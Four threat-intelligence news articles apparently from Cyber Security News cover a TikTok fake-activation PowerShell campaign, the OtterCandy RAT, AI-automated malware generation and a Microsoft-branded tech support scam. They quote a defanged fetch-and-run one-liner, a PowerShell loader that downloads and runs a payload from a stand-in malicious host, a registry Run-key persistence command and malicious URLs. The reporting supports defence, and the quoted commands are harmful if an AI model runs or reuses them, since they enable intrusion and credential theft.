Cybercriminals are exploiting TikTok’s massive user base to distribute sophisticated malware campaigns that promise free software activation but deliver dangerous payloads instead.

The attack leverages social engineering tactics reminiscent of the ClickFix technique, where unsuspecting users are tricked into executing malicious PowerShell commands on their systems.

Victims encounter TikTok videos offering free activation of popular software like Photoshop, with one such video accumulating over 500 likes before detection.

The attack chain begins when users follow instructions to open PowerShell with administrator privileges and execute a deceptively simple one-liner command.

The initial infection vector instructs victims to run the command iex (irm slmgr[.]win/photoshop), which fetches and executes malicious PowerShell code from a remote server.

This first-stage payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) achieved a VirusTotal detection rate of 17/63, demonstrating its evasive capabilities.

The script downloads a secondary executable called updater.exe from hxxps://file-epq[.]pages[.]dev/updater.exe, which analysis revealed as AuroStealer malware designed to harvest sensitive credentials and system information.

Internet Storm Center researchers identified the campaign and discovered that persistence mechanisms are implemented through scheduled tasks disguised as legitimate system processes.

The malware randomly selects task names such as “MicrosoftEdgeUpdateTaskMachineCore” to blend in with genuine Windows services, ensuring execution at every user logon.

A third payload named source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) introduces an advanced evasion technique by compiling C# code on-demand during runtime using the .NET Framework compiler located at C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe.

Self-Compiling Technique and Memory Injection

The self-compiling capability represents a sophisticated approach to evade traditional detection mechanisms.

The malware compiles a C# class during execution that imports kernel32.dll functions including VirtualAlloc, CreateThread, and WaitForSingleObject.

This dynamically compiled code allocates executable memory space, injects shellcode directly into the process memory, and creates a new thread to execute the malicious payload without writing additional files to disk.

Researchers discovered multiple variations of this campaign across TikTok targeting users searching for cracked versions of various software applications, highlighting the importance of avoiding untrusted sources for software downloads.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution appeared first on Cyber Security News.

Cybercriminals associated with the North Korean threat group WaterPlum, also known as Famous Chollima or PurpleBravo, have escalated their activities with a sophisticated new malware strain called OtterCandy.

This cross-platform RAT and information stealer represents a dangerous evolution in the group’s capabilities, combining features from previously observed malware families RATatouille and OtterCookie to create a more potent weapon for credential theft and system compromise.

The malware emerges as part of WaterPlum’s ClickFake Interview campaign, a deceptive social engineering operation that masquerades as legitimate job recruitment processes in the blockchain and cryptocurrency sectors.

Attackers create convincing fake company websites, such as BlockForgeX, which present seemingly authentic job applications and interview processes to lure unsuspecting victims into downloading malicious software under the guise of camera setup instructions or driver updates.

NTT Security researchers identified OtterCandy as the latest addition to WaterPlum’s arsenal, noting its deployment across Windows, macOS, and Linux platforms since July 2025.

The malware’s impact extends beyond individual systems, as attacks have been observed targeting victims in Japan and other regions, demonstrating the threat group’s expanding global reach and ambitions.

Built using Node.js, OtterCandy establishes communication with command-and-control servers through Socket.IO connections, enabling threat actors to execute a comprehensive range of malicious activities remotely.

The malware’s command structure reveals its sophisticated design, implementing functions such as ‘imp’ for sweeping home directories, ‘pat’ for pattern-based file searches, and ‘upload’ for extracting system information, browser credentials, and cryptocurrency wallet data.

Advanced Persistence and Evasion Mechanisms

OtterCandy demonstrates remarkable resilience through its multi-layered persistence strategy that ensures continued operation even after detection attempts.

While the malware typically relies on the preceding DiggingBeaver component for initial persistence, it incorporates an independent backup mechanism that automatically restarts processes when interrupted.

This self-preservation feature utilizes JavaScript’s process event handling to monitor for SIGINT signals:-

function startChildProcess() {
    const_0x4777b5 = fork(path['join') (_dirname, 'decode.js'), [], {
        'detached': !![],
        'stdio': 'ignore'
    });
    _0x4777b5['unref']();
}

process['on']('SIGINT', () => {
    startChildProcess();
    process['exit']();
});

The malware’s August 2025 update introduced enhanced anti-forensic capabilities, including comprehensive trace deletion functions that remove registry entries, downloaded files, and temporary directories.

This cleanup mechanism operates through the ‘ss_del’ command, systematically erasing evidence of compromise while maintaining operational security for the threat actors’ ongoing campaigns.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Threat Actors Leveraging ClickFake Interview Attack to Deploy OtterCandy Malware appeared first on Cyber Security News.

Security teams around the world are grappling with a new breed of cyber threats that leverage advanced automation to identify software weaknesses and craft malicious payloads at unprecedented speed.

Over the past year, adversaries have integrated machine-driven workflows into their operations, enabling opportunistic criminals and well-funded groups alike to discover zero-days and assemble malware with minimal human intervention.

This evolution markedly lowers the barrier to entry for sophisticated attacks, extending capabilities once limited to nation-state actors to any motivated cybercriminal.

The Microsoft Digital Defense Report highlights that attackers are no longer manually hunting for exploitable bugs through tedious code reviews or mass scanning.

Instead, they are training large-scale models on publicly available code repositories, then directing the models to generate proof-of-concept exploits for specific targets.

In parallel, the same automated pipelines transform these exploits into fully featured malware families by appending obfuscation layers, custom command-and-control routines, and persistence modules.

Microsoft analysts noted that this end-to-end automation has reduced vulnerability turnaround time from weeks to mere hours, dramatically compressing the time Windows defenders have to patch critical systems.

As organizations reflect on this shifting landscape, it becomes clear that traditional signature-based defenses offer diminishing returns.

Real-time threat hunting and behavior-based detection must evolve to counter automatically generated threats.

Microsoft researchers identified numerous incidents where bespoke malware variants—indistinguishable by signature from benign test code—evaded antivirus engines and sandbox environments, silently establishing footholds in enterprise networks.

Security operations centers (SOCs) now face the dual challenge of high-velocity attack generation and increasingly evasive payloads.

Understanding the infection mechanism

A closer look at the automated infection chain reveals how attackers leverage scripting and orchestration frameworks to deliver and activate malicious code.

Initially, the adversary’s AI model generates an exploit targeting a specific library or application component—such as a deserialization flaw in a widely deployed web framework.

The model then crafts a loader script in PowerShell or Python that dynamically fetches the payload:-

$url = "https://malicious.example.com/payload.bin"
$bytes = (New-Object Net.WebClient).DownloadData($url)
[System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())

This loader script is injected into harmless-looking documents or served via spear-phishing emails, evading static defenses.

Once executed, the loader decrypts and launches the generated malware in memory, bypassing disk-based detection.

To maintain persistence, the automation pipeline appends code that registers a scheduled task or implants a fallback registry run key:-

New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
  -Name "SysUpdate" -Value "powershell -ExecutionPolicy Bypass -File %UserProfile%\update.ps1"

Microsoft analysts identified that many such scripts leverage randomized names and variable assignments, ensuring each campaign appears unique and further confounding detection logic.

This fusion of automated vulnerability discovery and instantaneous malware generation marks a turning point in cyber offense.

Defenders must prioritize continuous monitoring of anomalous behaviors, implement stringent application allow-listing, and adopt rapid patch orchestration to mitigate emerging threats before they can be weaponized.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Hackers Using AI to Automate Vulnerability Discovery and Malware Generation – Microsoft Report appeared first on Cyber Security News.

A new campaign has emerged that weaponizes Microsoft’s familiar branding to lure unsuspecting users into a sophisticated tech support scam.

Victims receive a seemingly legitimate email, complete with Microsoft’s official logo, claiming there is an important financial transaction or security alert requiring immediate attention.

The message prompts recipients to click a link under the guise of confirming identity or resolving an urgent issue.

Cofense analysts noted that the threat actors have refined their social engineering tactics by combining payment lures with deceptive UI overlays to maximize impact.

Upon clicking the link, users are redirected through a faux CAPTCHA challenge designed to mimic a trusted verification process.

When the victim completes the verification, they are led to a landing page where the browser appears locked by multiple pop-up windows styled after genuine Microsoft security alerts.

The attacker’s goal is to create a sense of panic, convincing the user that their system has been compromised beyond normal functionality.

In many cases, the scam culminates in a displayed support phone number claiming to be Microsoft’s helpline.

When the victim dials, they connect to a malicious actor posing as a support technician.

Under the pretext of resolving the infection, the scammer persuades the target to divulge their Microsoft account credentials or install a remote desktop tool to “repair” the system, thereby granting full access to the attacker’s infrastructure.

Infection Mechanism

The infection begins with a list of observed URLs that serve as redirectors and payload hosts. The initial redirector domains include:

hxxps://alphadogprinting.com/index.php?8jl9lz
hxxps://amormc.com/index.php?ndv5f1

These URLs funnel victims through a CAPTCHA page before landing on the malicious overlay server. The payload domains, such as:

hxxps://my.toruftuiov.com/9397b37a-50c4-48c0-899d-f5e87a24088d
hxxps://deprivy.stified.sbs/proc.php

host the scripted overlays that manipulate the DOM to disable mouse control and display counterfeit alerts.

The browser lock is purely illusory and can be dismissed by pressing the ESC key, but few victims discover this before contacting the attacker.

By blending trusted logos with multiple redirect stages and UI deception, this campaign exemplifies an evolving threat that leverages brand familiarity to facilitate credential theft.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New Tech Support Scam with Microsoft’s Logo Tricks Users to Steal Login Credentials appeared first on Cyber Security News.